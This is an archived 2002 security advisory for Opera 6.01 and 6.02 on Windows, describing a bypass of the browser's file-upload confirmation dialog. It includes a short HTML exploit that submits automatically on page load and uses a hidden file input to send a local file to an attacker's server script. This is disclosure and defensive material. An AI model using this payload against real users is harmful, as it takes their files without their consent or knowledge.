TUCoPS :: Browsers :: win5381.htm

Opera permit unwanted local file upload
30th May 2002 [SBWID-5381]
COMMAND

	Opera permit unwanted local file upload

SYSTEMS AFFECTED

	Opera 6.01 on Windows platforms. Opera 6.02 on Windows platforms.

PROBLEM

	In         GreyMagic         Security         Advisory         GM#001-OP
	[http://sec.greymagic.com/adv/gm001-op/]
	

	Opera, like all browsers today, supports  the  <input  type=\"file\">
	element, which is a standard method for users to upload  files  to  HTTP
	servers. Since the file element is a  very  security-sensitive  element,
	most web browsers do not allow its \"value\" attribute to be  set  (read
	only). If  it  was  possible  to  assign  an  arbitrary  string  to  the
	\"value\" attribute, an attacking server could fetch any local  file  by
	simply submitting a form (through scripting or  social  engineering,  if
	scripting has been disabled).
	

	Opera\'s approach to  the  file  element  is  a  little  different.  The
	\"value\" attribute can be set, but before the form  it  resides  in  is
	submitted, a dialog comes up with the  following  warning:  \"The  files
	listed below have been selected, without your intervention, to  be  sent
	to another computer. Do you want to send these files?\"
	

	 Discussion

	 ==========

	

	It is possible to bypass the file element\'s confirmation dialog,  which
	means an attacker can download  any  file  from  an  unsuspecting  Opera
	user.
	

	By appending a simple \"&#10;\" (HTML entity, which  represents  the
	ASCII code for a new-line character) to the end of the  file  element\'s
	\"value\" attribute, Opera\'s security  algorithm  is  fooled  to  think
	that no files were assigned.  Therefore,  the  warning  dialog  doesn\'t
	come up; Opera simply submits the form with the desired file  chosen  by
	an attacker.
	

	Surprisingly, versions of Opera prior to  6.01  are  not  vulnerable  to
	this attack. So a change that occurred between version 6.0 and  6.01  is
	the culprit. This also means that all of the  non-windows  versions  are
	safe (Opera did not release 6.01 for other platforms yet).
	

	 Exploit

	 =======

	

	This exploit will automatically transfer the file \"c:/test.txt\" to  an
	attacking host, which can handle  it  using  a  server-side  environment
	such as ASP, PHP or other  solutions.  It  does  not  require  any  user
	interaction:
	

	

	<body onload=\"document.secForm.submit()\">

	<form method=\"post\" enctype=\"multipart/form-data\" action=\"recFile.php\" name=\"secForm\">

	<input type=\"file\" name=\"expFile\" value=\"c:\\test.txt&#10;\" style=\"visibility:hidden\">

	</form>

	</body>

	

SOLUTION

	Upgrade to version 6.03

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH